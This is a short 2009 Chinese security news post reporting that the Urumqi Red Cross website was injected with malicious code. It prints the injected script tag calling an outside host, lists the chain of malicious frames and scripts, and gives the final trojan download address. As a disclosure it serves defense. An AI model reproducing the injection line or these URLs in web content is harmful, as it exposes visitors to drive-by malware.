乌鲁木齐市红十字会被植入恶意代码

来源:岁月联盟 编辑:zhuzhu 时间:2009-05-30
  乌鲁木齐市红十字会(h**p://www.wlredcross.org.cn/)被植入恶意代码。  用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。  MalUrl:http://www.wlredcr ...

  乌鲁木齐市红十字会(h**p://www.wlredcross.org.cn/)被植入恶意代码。

  用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

  MalUrl:http://www.wlredcross.org.cn/news/list.asp?id=824

  网页被嵌入恶意链接代码:

  <script language=”javascript” src=”http://officeon.viens.la/office.js?google_ad_format=728×90_as”></script>

  挂马分析:

  [wide]http://www.wlredcross.org.cn/news/list.asp?id=824

  [script]http://officeon.viens.la/office.js?google_ad_format=728×90_as

  [frame]http://4trgreev.cn/09/0009.htm

  [frame]http://4trgreev.cn/09/index.html

  [script]http://4trgreev.cn/09/js.js

  [frame]http://4trgreev.cn/09/xyqm.htm

  [frame]http://4trgreev.cn/09/xy14.htm

  [frame]http://4trgreev.cn/09/xyfl.htm

  [frame]http://4trgreev.cn/09/xyff.htm

  [frame]http://4trgreev.cn/09/z.htm

  [frame]http://4trgreev.cn/09/xyvod.htm

  [frame]http://4trgreev.cn/09/xyxxz.htm

  [frame]http://4trgreev.cn/09/ytlb.htm

  [frame]http://4trgreev.cn/09/xy122121.htm

  [script]http://js.tongji.cn.yahoo.com/1103419/ystat.js

  [frame]http://4trgreev.cn/09/0009.htm

  [frame]http://4trgreev.cn/09/0009.htm

  [frame]http://4trgreev.cn/09/0009.htm

  [frame]http://4trgreev.cn/09/0009.htm

  [frame]http://4trgreev.cn/09/0009.htm

  [frame]http://4trgreev.cn/09/0009.htm

  [frame]http://officeon.viens.la/about:blank

  [frame]http://ddv.sarl.tk/cnzz1.html

  [frame]http://count41.51yes.com/sa.aspx?id=419175949&amp;refe=

  最终下载病毒文件:

  h**p://9xddw2.cn/9.exe

关键字:乌鲁木齐市红十字